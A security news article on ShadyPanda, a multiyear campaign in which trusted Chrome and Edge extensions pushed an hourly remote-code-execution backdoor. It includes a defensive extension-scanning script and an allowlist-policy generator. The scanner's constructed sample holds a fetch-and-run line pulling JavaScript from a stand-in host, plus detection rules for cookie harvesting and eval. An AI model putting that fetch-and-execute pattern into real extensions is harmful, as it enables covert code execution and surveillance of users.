
4.3M Users Exposed in ShadyPanda’s Long-Running Browser Hack

ShadyPanda spent years hiding inside Google-verified extensions before unleashing an RCE backdoor that compromised 4.3 million users.

Written by Ken Underhill
Dec 2, 2025

Millions of Chrome and Edge users spent years running hidden spyware, fooled by extensions that appeared safe and even Google-verified. 

Researchers found that a single threat actor, dubbed ShadyPanda, quietly built a multiyear operation that weaponized browser marketplaces and now potentially impacts more than 4.3 million users. 

What began as low-level affiliate fraud evolved into a sophisticated remote-code-execution (RCE) backdoor capable of full browser takeover.

The impacted browser extensions “… run hourly remote code execution – downloading and executing arbitrary JavaScript with full browser access,” said Koi researchers.

The Multi-Phase Campaign Behind ShadyPanda’s Rise

ShadyPanda’s operation unfolded in deliberate stages. Early campaigns in 2023 deployed 145 extensions that masqueraded as wallpapers or simple productivity tools. 

These collected browsing data and injected affiliate codes into retail sites like Amazon and Booking[.]com. 

While not deeply technical, this phase taught the attackers how extension marketplaces review submissions, how users interpret trust signals, and how long benign-looking extensions can operate undetected.

A second wave in early 2024 became more aggressive. Extensions such as Infinity V+ hijacked search traffic, redirected queries through known browser hijackers, and exfiltrated cookies to attacker-controlled infrastructure. 

The extensions captured keystrokes in real time — including partial queries before they were submitted — giving ShadyPanda insight into user behavior at a granular level.

That’s when ShadyPanda switched tactics and began playing the long game.

The RCE Backdoor That Compromised Millions

ShadyPanda pivoted from short-term monetization to deep compromise. 

Extensions like Clean Master, uploaded as early as 2018, spent years building legitimacy — earning “Featured” and “Verified” badges from Google and accumulating hundreds of thousands of installs.

Only after gaining trust did the attackers push a malicious update in mid-2024. That single update delivered an hourly RCE backdoor, allowing remote servers to send arbitrary JavaScript into users’ browsers. 

The code executed with full access to browser APIs, letting ShadyPanda:

  • Monitor every URL visited
  • Collect timestamps, referrer paths, and navigation behavior
  • Capture complete browser fingerprints
  • Sync persistent identifiers across devices
  • Exfiltrate encrypted data to attacker infrastructure

The malware also included anti-analysis checks, a custom JavaScript interpreter used to evade detection, and the ability to intercept HTTPS traffic through the extension's service worker, enabling credential theft and content injection.
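The behaviours listed above (an hourly timer, a fetch of remote JavaScript plus a way to run it, a service-worker fetch hook, navigation logging, and broad host and cookie permissions) are all visible in an extension's manifest and background script, which makes them a reasonable basis for triage when you audit what is installed. The script below is an added example written for this article, not code from Koi's report or from any of the extensions involved; it runs under Node.js with no dependencies over a manifest and background source passed in as text. The two sample extensions, their names, and the example.invalid URL are constructed for illustration, and the rule weights and verdict thresholds are editorial judgement rather than any published standard.

```javascript
'use strict';

// Heuristic rules run over the background / service-worker source.
// Each entry: [name, pattern, weight]. Weights are editorial judgement.
const SOURCE_RULES = [
  ['hourly-alarm',     /chrome\.alarms\.create\([^)]*periodInMinutes\s*:\s*60\b/, 3],
  ['remote-fetch',     /fetch\(\s*['"`]https?:\/\//,                               1],
  ['dynamic-eval',     /\b(eval|new\s+Function)\s*\(/,                             4],
  ['script-injection', /chrome\.scripting\.executeScript\(/,                       2],
  ['sw-fetch-hook',    /addEventListener\(\s*['"]fetch['"]/,                       3],
  ['cookie-harvest',   /chrome\.cookies\.getAll\(/,                                2],
  ['nav-logging',      /chrome\.(webNavigation|tabs)\.on(Completed|Updated)\.addListener/, 1],
];

// Permissions that, combined with remote code, give an operator the reach described above.
const RISKY_PERMISSIONS = new Set([
  'cookies', 'webRequest', 'webRequestBlocking', 'scripting', 'tabs',
  'webNavigation', 'declarativeNetRequest', 'history', 'debugger',
]);

// <all_urls>, *://*/*, http://*/* and https://*/* all mean "every site".
const BROAD_HOST = /^(<all_urls>|(\*|https?):\/\/\*\/)/;

function analyzeExtension(manifestText, backgroundSource) {
  const manifest = JSON.parse(manifestText);
  const findings = [];
  let score = 0;
  const hit = (rule, detail, weight) => { findings.push({ rule, detail }); score += weight; };

  // MV3 puts host patterns in host_permissions, MV2 in permissions; check both.
  const hosts = [...(manifest.host_permissions || []), ...(manifest.permissions || [])]
    .filter((p) => BROAD_HOST.test(p));
  if (hosts.length) hit('broad-host-access', hosts.join(', '), 2);

  const risky = (manifest.permissions || []).filter((p) => RISKY_PERMISSIONS.has(p));
  if (risky.length) hit('risky-permissions', risky.join(', '), risky.length);

  for (const [name, pattern, weight] of SOURCE_RULES) {
    const m = backgroundSource.match(pattern);
    if (m) hit(name, m[0].slice(0, 60), weight);
  }

  // The combination is what matters: remote code plus a way to execute it.
  const seen = new Set(findings.map((f) => f.rule));
  if (seen.has('remote-fetch') && (seen.has('dynamic-eval') || seen.has('script-injection'))) {
    hit('remote-code-execution-chain', 'fetches remote JavaScript and has a way to run it', 5);
  }
  // A custom interpreter will not match eval(); a periodic remote fetch is still worth a look.
  if (seen.has('remote-fetch') && seen.has('hourly-alarm')) {
    hit('periodic-remote-fetch', 'fetches a remote resource on an hourly timer', 2);
  }

  const verdict = score >= 10 ? 'block' : score >= 5 ? 'review' : 'allow';
  return { name: manifest.name, version: manifest.version, score, verdict, findings };
}

// Constructed samples (not real extensions). example.invalid is a reserved name.
const SUSPECT_MANIFEST = JSON.stringify({
  manifest_version: 3, name: 'Sample Cleaner', version: '4.2.0',
  permissions: ['alarms', 'cookies', 'scripting', 'tabs', 'webNavigation'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'bg.js' },
});
const SUSPECT_BACKGROUND = `
chrome.alarms.create('sync', { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const src = await (await fetch('https://example.invalid/p.js')).text();
  new Function('chrome', src)(chrome);           // runs whatever the server sent
});
self.addEventListener('fetch', (e) => { /* can read or rewrite responses */ });
chrome.webNavigation.onCompleted.addListener((d) => report(d.url, Date.now()));
`;
const BENIGN_MANIFEST = JSON.stringify({
  manifest_version: 3, name: 'Plain Wallpaper', version: '1.0.3',
  permissions: ['storage'], background: { service_worker: 'bg.js' },
});
const BENIGN_BACKGROUND = `chrome.storage.local.get('theme', (v) => applyTheme(v.theme));`;

// Stand-alone run: prints both reports.
for (const [m, s] of [[SUSPECT_MANIFEST, SUSPECT_BACKGROUND], [BENIGN_MANIFEST, BENIGN_BACKGROUND]]) {
  console.log(JSON.stringify(analyzeExtension(m, s), null, 2));
}
```

In practice you would point this at the unpacked extension directories under each user's browser profile and at the bundled background file the manifest names. Treat a "block" as a reason to pull the extension and rotate sessions, and a "review" as a reason to read the source, since a hand-written interpreter or obfuscation will defeat the eval rule while leaving the timer and fetch visible.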

Mitigation Strategies for Extension-Driven Attacks

Because browser extensions can operate with high privilege by default, organizations must take a more proactive approach to monitoring, controlling, and hardening their browser ecosystems.

  • Audit all installed browser extensions and remove any unnecessary, unvetted, or high-risk extensions with broad permissions.
  • Enforce enterprise extension allowlists and use browser management tools to centrally control installation, updates, and permissions.
  • Monitor for indicators of compromise by inspecting browser logs, service-worker activity, outbound traffic, and known ShadyPanda domains.
  • Restrict or stage automatic extension updates to prevent trusted extensions from silently becoming malicious.
  • Rebuild or reset compromised browser profiles and rotate all exposed credentials, tokens, and session cookies.
  • Harden high-risk environments — especially developer workstations — using sandboxed browsing, hardware-based authentication, and secret-management tools.
  • Integrate browser security into asset management and user training by tracking extension inventories and educating users on extension risks.

As browser extensions continue to play a central role in daily workflows, they also increase the attack surface. This makes proactive extension management essential for reducing enterprise risk.
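The allowlist, permission, and staged-update controls in the list above map onto one mechanism in managed Chrome and Edge: the ExtensionSettings policy. The script below is an added example written for this article, not tooling from Google, Microsoft, or Koi. It builds that policy object from a list of vetted extension IDs and then runs a simplified model of how the browser applies it to a candidate extension; the model covers only the checks this page cares about and is not the browser's own logic. The extension IDs, the corp.example hosts, and the staging update URL are placeholders, and the assumption that override_update_url redirects update checks to the policy's update_url should be confirmed against your browser version's policy reference.

```javascript
'use strict';

const EXTENSION_ID = /^[a-p]{32}$/;   // Chrome/Edge extension IDs: 32 characters from a-p

// Assumed placeholders: an internal update server where new versions are staged
// and vetted before rollout, and internal hosts no extension should touch.
const STAGING_UPDATE_URL = 'https://extensions.corp.example/updates.xml';
const SENSITIVE_HOSTS = ['*://*.corp.example/*', '*://sso.corp.example/*'];

// Permissions no extension on the fleet should hold, applied to every extension via "*".
const DENIED_PERMISSIONS = ['cookies', 'webRequest', 'webRequestBlocking',
  'debugger', 'nativeMessaging', 'proxy', 'history'];

// allowlist: [{ id, minVersion, forced }] for extensions that passed review.
function buildExtensionPolicy(allowlist) {
  const policy = {
    '*': {
      installation_mode: 'blocked',                 // default-deny everything not listed
      blocked_permissions: DENIED_PERMISSIONS,
      runtime_blocked_hosts: SENSITIVE_HOSTS,
      blocked_install_message: 'Browser extensions must be approved by security.',
    },
  };
  for (const ext of allowlist) {
    if (!EXTENSION_ID.test(ext.id)) throw new Error(`not an extension id: ${ext.id}`);
    policy[ext.id] = {
      installation_mode: ext.forced ? 'force_installed' : 'allowed',
      minimum_version_required: ext.minVersion,     // older builds are disabled
      update_url: STAGING_UPDATE_URL,               // updates come through staging, not straight from the store
      override_update_url: true,                    // assumed to make the browser use update_url above
    };
  }
  return policy;
}

// Simplified model of the browser's policy evaluation for one extension.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number), pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

function evaluateInstall(policy, id, manifest) {
  const entry = policy[id] || policy['*'];
  if (['blocked', 'removed'].includes(entry.installation_mode)) {
    return { allowed: false, reason: policy[id] ? 'explicitly blocked' : 'not on allowlist' };
  }
  const denied = new Set([...(policy['*'].blocked_permissions || []), ...(entry.blocked_permissions || [])]);
  const clash = (manifest.permissions || []).filter((p) => denied.has(p));
  if (clash.length) return { allowed: false, reason: `requests blocked permission: ${clash.join(', ')}` };
  if (entry.minimum_version_required &&
      compareVersions(manifest.version, entry.minimum_version_required) < 0) {
    return { allowed: false, reason: `version ${manifest.version} below minimum ${entry.minimum_version_required}` };
  }
  return { allowed: true, reason: entry.installation_mode };
}

// Stand-alone run with a placeholder ID: prints the policy value to deploy.
const VETTED_ID = 'abcdefghijklmnopabcdefghijklmnop';
const POLICY = buildExtensionPolicy([{ id: VETTED_ID, minVersion: '2.0.0', forced: false }]);
console.log(JSON.stringify({ ExtensionSettings: POLICY }, null, 2));
console.log(evaluateInstall(POLICY, VETTED_ID, { version: '2.1.0', permissions: ['storage'] }));
console.log(evaluateInstall(POLICY, VETTED_ID, { version: '2.1.0', permissions: ['cookies'] }));
```

The object the script prints is the value of the ExtensionSettings policy: on Linux it goes in a JSON file under /etc/opt/chrome/policies/managed/ (or the Edge equivalent), on Windows it is set through the Chrome or Edge policy registry keys, and on macOS through the managed preferences plist. After deployment, chrome://policy (edge://policy) shows whether the value parsed and which entries are in effect; an extension listed in the allowlist but requesting a denied permission will still be blocked, which is the intended outcome for a trusted extension that suddenly asks for cookies or webRequest in an update.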

The Hidden Trust Gap in Browser Extensions

ShadyPanda exploited a single systemic weakness for seven years: browser extension marketplaces concentrate their scrutiny on the initial submission. 

After approval, an extension inherits the trust it earned at review. It receives little continuous monitoring or behavioral analysis, and the silent updates that can replace its entire code base draw almost no further oversight. 

This gap mirrors broader software supply chain risks, where attackers infiltrate trusted components and weaponize them long after initial review. 

Such unchecked trust underscores the need for a zero-trust approach, where every component is continuously validated rather than accepted by default.

Property of TechnologyAdvice. © 2025 TechnologyAdvice. All Rights Reserved